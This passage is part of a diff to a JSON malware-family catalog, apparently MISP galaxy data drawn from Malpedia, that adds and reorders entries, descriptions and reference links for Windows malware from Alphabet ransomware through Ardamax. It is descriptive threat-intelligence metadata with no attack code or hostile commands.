Local PrivEsc" }, { - "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.", + "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user\u2019s screen and prohibits any interaction with the computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", @@ -12697,9 +13270,23 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphaseed", + "https://medium.com/s2wblog/detailed-analysis-of-alphaseed-a-new-version-of-kimsukys-appleseed-written-in-golang-2c885cce352a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "966c5a6d-16b8-43b1-acbd-163e904d4a03", + "value": "AlphaSeed" + }, + { + "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], @@ -12714,13 +13301,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", + "https://www.youtube.com/watch?v=FttiysUZmDw", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt", "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf", - "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" + "https://twitter.com/Sebdraven/status/1496878431719473155", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" ], "synonyms": [ "Olmarik", @@ -12739,38 +13327,44 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", - "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://isc.sans.edu/diary/27264", - "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://asec.ahnlab.com/en/41450/", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://twitter.com/0xffff0800/status/1062948406266642432", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://www.anquanke.com/post/id/230116", + "https://asec.ahnlab.com/en/44504/", + "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_string_decryptor.py", + "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/", + "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4", + "https://asec.ahnlab.com/en/36634/", + "https://nao-sec.org/2019/04/Analyzing-amadey.html", + "https://embee-research.ghost.io/amadey-bot-infrastructure/", "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", "https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/", + "https://asec.ahnlab.com/en/41450/", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", + "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/", + "https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://isc.sans.edu/diary/27264", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_config_extractor.ipynb", + "https://embee-research.ghost.io/shodan-censys-queries/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://twitter.com/ViriBack/status/1062405363457118210", "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot", - "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", - "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4", - "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", - "https://nao-sec.org/2019/04/Analyzing-amadey.html", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://asec.ahnlab.com/en/36634/", - "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://asec.ahnlab.com/en/44504/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -12783,8 +13377,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", - "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", - "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/" ], "synonyms": [ "Adupihan" @@ -12799,8 +13393,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/", - "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/" + "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" ], "synonyms": [], "type": [] @@ -12813,26 +13407,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", - "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", - "https://isc.sans.edu/diary/27308", - "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/", - "https://www.netscout.com/blog/asert/dropping-anchor", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", - "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/" + "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://isc.sans.edu/diary/27308", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/" ], "synonyms": [], "type": [] @@ -12845,10 +13439,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormail", + "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/", - "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/" + "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/" ], "synonyms": [], "type": [] @@ -12856,11 +13450,28 @@ "uuid": "7792096a-7623-43a1-9a67-28dce0e4b39e", "value": "AnchorMail" }, + { + "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea", + "http://report.threatbook.cn/LS.pdf", + "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "565de3f5-7eb7-43ca-a9d9-b588dfd6a50a", + "value": "AnchorMTea" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor", + "https://asec.ahnlab.com/en/56405/", + "https://asec.ahnlab.com/ko/56256/", "https://asec.ahnlab.com/ko/47751/" ], "synonyms": [], @@ -12874,28 +13485,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", - "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", - "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", - "https://blog.avast.com/andromeda-under-the-microscope", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", - "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", - "http://blog.morphisec.com/andromeda-tactics-analyzed", - "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", - "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", - "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/" + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/" ], "synonyms": [ "B106-Gamarue", @@ -12909,20 +13520,21 @@ "value": "Andromeda" }, { - "description": "", + "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The \u201cAndro\u201d part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and \u201cMut\u201d is based off a mutex that the analyzed sample creates: \u201cmutshellmy777\u201d.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf" + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [ "Gelup" @@ -12937,11 +13549,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf" + "https://www.secureworks.com/research/threat-profiles/bronze-riverside" ], "synonyms": [ "UPPERCUT", @@ -12986,9 +13598,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/", "https://twitter.com/MsftSecIntel/status/1298752223321546754", - "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/", - "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/" + "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/" ], "synonyms": [ "Anubis Stealer" @@ -13003,10 +13615,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis_loader", - "https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/", - "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", - "https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/", "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/", + "https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/", + "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", + "https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/", "https://windowsreport.com/kraken-botnet/" ], "synonyms": [ @@ -13076,11 +13688,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle", "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/", - "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf", - "https://assets.sentinelone.com/sentinellabs/evol-agrius", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/", + "https://assets.sentinelone.com/sentinellabs/evol-agrius", "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/", - "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/" + "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf" ], "synonyms": [], "type": [] @@ -13093,21 +13705,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", - "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://twitter.com/VK_Intel/status/1182730637016481793", + "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", "https://www.telsy.com/download/5394/?uid=28b0a4577e", - "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", - "https://twitter.com/VK_Intel/status/1182730637016481793" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023" ], "synonyms": [], "type": [] @@ -13120,24 +13734,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", - "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", - "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf", - "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf", - "https://www.youtube.com/watch?v=rfzmHjZX70s", - "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", - "https://asec.ahnlab.com/ko/26705/", - "https://asec.ahnlab.com/en/36368/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", - "https://www.telsy.com/download/5654/?uid=4869868efd", - "https://asec.ahnlab.com/en/30532/", - "https://asec.ahnlab.com/ko/36918/", - "https://asec.ahnlab.com/en/41015/", "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf", + "https://asec.ahnlab.com/en/36368/", + "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.youtube.com/watch?v=Dv2_DK3tRgI" + "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", + "https://asec.ahnlab.com/ko/36918/", + "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf", + "https://www.telsy.com/download/5654/?uid=4869868efd", + "https://asec.ahnlab.com/ko/26705/", + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://asec.ahnlab.com/en/41015/", + "https://asec.ahnlab.com/ko/54804/", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf", + "https://asec.ahnlab.com/en/30532/", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", + "https://www.youtube.com/watch?v=Dv2_DK3tRgI", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf" ], "synonyms": [ "JamBog" @@ -13148,7 +13763,7 @@ "value": "Appleseed" }, { - "description": "", + "description": "According to f-secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product's website.& When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.\r\n\r\nThis program can be configured to a complete stealth mode, with password protection, to avoid user detection.\r\n\r\nThe information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).", "meta": { "refs": [ 